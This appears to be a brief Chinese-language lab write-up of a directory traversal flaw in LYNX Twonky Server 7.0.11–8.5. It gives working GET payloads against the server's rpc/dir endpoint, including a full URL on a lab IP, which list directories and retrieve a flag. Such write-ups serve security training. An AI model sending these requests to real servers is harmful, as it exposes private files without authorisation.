描述:
LYNX Twonky Server是美国LYNX TECHNOLOGY公司的一款媒体服务器,支持在连接的设备之间共享媒体内容。 LYNX Twonky Server 7.0.11版本至8.5版本中存在目录遍历漏洞。远程攻击者可通过向rpc/set_all发送带有‘…’序列的‘contentbase’参数利用该漏洞分享任意目录的内容
启动靶场,进行访问:
get请求构造payload:/rpc/dir?path=/
看到tmp文件夹,flag在这个文件夹下,访问如下:
http://123.58.224.8:61560/rpc/dir?path=010
得到flag